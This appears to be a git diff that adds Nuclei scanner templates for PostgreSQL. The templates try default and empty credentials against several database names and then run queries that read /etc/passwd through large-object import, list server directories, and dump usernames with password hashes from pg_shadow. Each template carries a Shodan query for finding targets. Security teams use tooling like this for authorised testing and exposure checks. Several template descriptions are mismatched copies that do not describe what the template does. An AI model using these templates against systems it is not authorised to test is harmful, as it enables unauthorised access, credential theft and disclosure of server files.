diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml new file mode 100644 index 0000000000..e8f3e07731 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -0,0 +1,49 @@ +id: pgsql-default-db + +info: + name: Postgresql Default Database - Enumeration + author: pussycat0x + severity: high + description: | + Postgresql has a flaw that allows the attacker to login with empty password. + reference: + - https://www.tenable.com/plugins/nessus/104031 + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ConnectWithDB(Host, Port, User, Pass, Db); + connected ; + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - meow + database: + - foresight + - postgres + - template0 + - template1 + - test + password: + - postgres + - + attack: clusterbomb + + matchers: + - type: dsl + dsl: + - "success == true" + - "response == true" + condition: and \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-exp.yaml b/javascript/enumeration/pgsql/pgsql-exp.yaml new file mode 100644 index 0000000000..3c1dd8ba11 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-exp.yaml @@ -0,0 +1,63 @@ +id: postgresql-exprement + +info: + name: PGSQL -EXP + author: pussycat0x + severity: info + description: | + Read and list the files within the PostgreSQL database, + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + const flread = "SELECT lo_import('/etc/passwd');" + for (let i=0; i < 1; i++){ + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, flread); + const final = to_json(connected) + const parsedData = JSON.parse(final); + const loImportValue = parsedData.Rows[0].lo_import; + const valtw = "SELECT lo_get(" + loImportValue +");" + const qry = [valtw, "SELECT * from pg_largeobject;"]; + for (const x of qry){ + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x); + Export(connected); + } + + } + + + + + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "success == true" + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml new file mode 100644 index 0000000000..09b8738884 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -0,0 +1,42 @@ +id: postgresql-file-read + +info: + name: PostgreSQL File Read + author: pussycat0x + severity: info + description: | + Read and list the files within the PostgreSQL database, + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[].pg_ls_dir' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml new file mode 100644 index 0000000000..6913a7d607 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -0,0 +1,42 @@ +id: postgresql-list-database + +info: + name: PostgreSQL List Database + author: pussycat0x + severity: info + description: | + PostgreSQL List Password Hashes + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes + - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database"); + Export(connected); + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[].datname' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml new file mode 100644 index 0000000000..7f02d97ca8 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -0,0 +1,42 @@ +id: pgsql-exec + +info: + name: PostgreSQL List Password Hashes + author: pussycat0x + severity: info + description: | + PostgreSQL List Password Hashes + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes + - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow"); + Export(connected) + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[] | "\(.usename) : \(.passwd)"' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml new file mode 100644 index 0000000000..4691e912af --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -0,0 +1,43 @@ +id: pgsql-list-users + +info: + name: PostgreSQL List Users + author: pussycat0x + severity: info + description: | + Postgresql has a flaw that allows the attacker to login with empty password. + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" +# Query: "\du" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[].usename' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml new file mode 100644 index 0000000000..b59271f752 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -0,0 +1,43 @@ +id: pgsql-version-detect + +info: + name: Postgresql Version - Detect + author: pussycat0x + severity: info + description: | + Postgresql has a flaw that allows the attacker to login with empty password. + reference: + - https://www.tenable.com/plugins/nessus/104031 + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" +# Query: "\du" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[0].version' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/postgresql-empty-password.yaml b/javascript/enumeration/pgsql/postgresql-empty-password.yaml new file mode 100644 index 0000000000..3dc010c7ad --- /dev/null +++ b/javascript/enumeration/pgsql/postgresql-empty-password.yaml @@ -0,0 +1,33 @@ +id: postgresql-empty-password + +info: + name: Postgresql Empty Password - Detect + author: pussycat0x + severity: high + description: | + Postgresql has a flaw that allows the attacker to login with empty password. + reference: + - https://www.tenable.com/plugins/nessus/104031 + metadata: + shodan-query: product:"PostgreSQL" + tags: js,network,postgresql + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + const connected = client.Connect(Host, Port, User, Pass); + connected; + + args: + Host: "{{Host}}" + Port: 5432 + User: "postgres" + Pass: "postgres" + + matchers: + - type: dsl + dsl: + - "success == true" + - "response == true" + condition: and \ No newline at end of file